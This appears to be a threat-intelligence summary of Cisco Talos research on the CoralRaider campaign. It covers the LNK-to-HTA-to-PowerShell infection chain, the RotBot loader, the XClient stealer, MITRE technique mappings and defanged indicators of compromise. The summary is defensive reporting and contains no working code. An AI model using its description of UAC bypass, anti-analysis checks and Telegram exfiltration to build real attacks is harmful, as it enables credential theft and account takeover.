Threat Research

CoralRaider targets victims’ data and social media accounts

Talos

Cisco Talos identified a financially motivated actor named CoralRaider that uses malicious LNK files to deliver a multi-stage loader (RotBot) and an XClient stealer to harvest browser credentials, financial data, and social media/ad account information. The campaign uses Telegram bots as the C2/exfiltration channel and leverages living‑off‑the‑land binaries and UAC bypass techniques. #CoralRaider #RotBot

Keypoints

  • Cisco Talos attributes the CoralRaider actor to Vietnam and links activity to PDB paths, Telegram bot artifacts, and an actor IP in Hanoi.
  • Initial access is achieved via malicious Windows shortcut (.lnk) files that download and execute an HTA, which runs obfuscated VBScript that spawns in-memory PowerShell scripts.
  • RotBot (a QuasarRAT variant) is deployed disguised as spoolsv.exe; it performs evasion and reconnaissance, downloads a configuration from a legitimate host, and uses Telegram bots for C2.
  • XClient stealer is loaded in memory by RotBot and collects browser data, stored credentials, credit card/payment info, and social media/business ad account details (Facebook, Instagram, TikTok, YouTube), plus screenshots.
  • The campaign abuses LoLBins such as ForFiles.exe and FoDHelper.exe (UAC bypass), modifies proxy registry keys, creates mutexes, and performs anti‑VM/anti‑analysis checks to avoid detection.
  • Exfiltration occurs via Telegram bot endpoints (/sendPhoto, /sendDocument) delivering PNG screenshots and ZIP archives containing stolen data; IOCs and ClamAV detections are published by Talos.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The campaign begins when a user opens a malicious Windows shortcut file (‘The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled download server.’)
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The HTA executes an embedded obfuscated Visual Basic script as part of the execution chain (‘The HTA file executes an embedded obfuscated Visual Basic script.’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The Visual Basic script launches an in-memory PowerShell script that decrypts and runs additional scripts (‘The malicious Visual Basic script executes an embedded PowerShell script in the memory, which decrypts and sequentially executes three other PowerShell scripts’).
  • [T1102] Web Service – The actor uses Telegram bots as the C2 channel and exfiltration mechanism (‘the actor uses a Telegram bot, as a C2, to exfiltrate the victim’s data’).
  • [T1071.001] Application Layer Protocol: Web Protocols – RotBot connects to a host on a legitimate domain to download its configuration file for C2 parameters (‘RotBot then connects to a host on a legitimate domain… and downloads the configuration file for the RotBot to connect to the C2’).
  • [T1041] Exfiltration Over C2 Channel – Collected screenshots and ZIP archives are sent to the attacker via Telegram endpoints (‘PNG and ZIP files are exfiltrated to the attacker’s Telegram bot C2’).
  • [T1555.003] Credentials from Web Browsers – XClient extracts cookies, stored credentials, and financial info from multiple browser installations (‘It targets Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browser data files… steals cookies, stored credentials, and financial information’).
  • [T1218] Signed Binary Proxy Execution (LoLBins) – The actor abuses Windows utilities such as ForFiles.exe and FoDHelper.exe to assist execution and UAC bypass (‘abusing … living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe’).
  • [T1497.001] Virtualization/Sandbox Evasion – Both RotBot and XClient perform anti-VM and anti-analysis checks to evade detection (‘performs several detection evasion checks on the victim machine’ and ‘performs anti-VM and anti-virus software checks’).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The campaign uses FoDHelper.exe and other mechanisms to bypass UAC and disable notifications (‘…bypass the User Access Controls, disables the Windows and application notifications on the victim’s machine’).

Indicators of Compromise

  • [IP Address] probable actor/victim infrastructure – 118[.]71[.]64[.]18 (Hanoi), 139[.]99[.]23[.]9 (seen in PDB paths).
  • [Shortcut filenames] delivery lures – manual.pdf.lnk, LoanDocs.lnk, and numerous other .lnk filenames such as your-award.pdf.lnk and Research.pdf.lnk.
  • [Drive serial numbers] metadata from LNKs – A0B4-2B36, FA4C-C31D (additional serials: 94AA-CEFB, 46F7-AF3B).
  • [PDB paths / developer artifacts] build and attribution evidence – examples from PDB strings: “D:ROTROTBuild rot Export2024Bot Export Chiến…spoolsv.pdb” and “D:ROTROTROT Ver 5.5SourceEncrypted…XClientbinDebugAI.pdb”.
  • [Detection names / AV signatures] vendor labels – Lnk.Downloader.CoralRaider-10024620-0, Win.Trojan.RotBot-10024631-0, Win.Infostealer.XClient-10025106-2.
  • [IOCs repository] published indicators – GitHub IOCs: https://github.com/Cisco-Talos/IOCs/tree/main/2024/04/ (contains hashes and additional indicators).

The technical infection chain begins with a crafted Windows shortcut (.lnk) that, when opened, downloads an HTA file from an attacker-controlled server. The HTA runs an obfuscated Visual Basic script which spawns an in-memory PowerShell payload; that PowerShell decrypts and executes further scripts that perform anti‑analysis/anti‑VM checks, bypass User Account Control, disable notifications, and retrieve and run the RotBot payload (a QuasarRAT variant) disguised as spoolsv.exe.

Once executed, RotBot performs host reconnaissance and additional evasion checks, modifies system proxy settings in the registry, creates mutexes as infection markers, and reaches out to a legitimate domain to retrieve a configuration that contains Telegram bot parameters. RotBot then loads the XClient stealer module from its resources; XClient runs anti‑VM/AV checks, captures screenshots, extracts browser databases (cookies, stored credentials, payment details) from Chrome/Edge/Firefox/other browsers, and enumerates social media/business ad account data (Facebook, Instagram, TikTok, YouTube), plus Telegram and Discord application data.

XClient writes mapped results to local temporary text files, bundles artifacts (PNG screenshots and ZIP archives), and exfiltrates them to the attacker-controlled Telegram bot endpoints (e.g., /sendPhoto and /sendDocument). Investigators found multiple corroborating IOCs including actor IPs, PDB paths with Vietnamese folder names, distinct LNK filenames and drive serials, and ClamAV/AV detection names; Talos published IOCs and references for further technical indicators. Read more: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/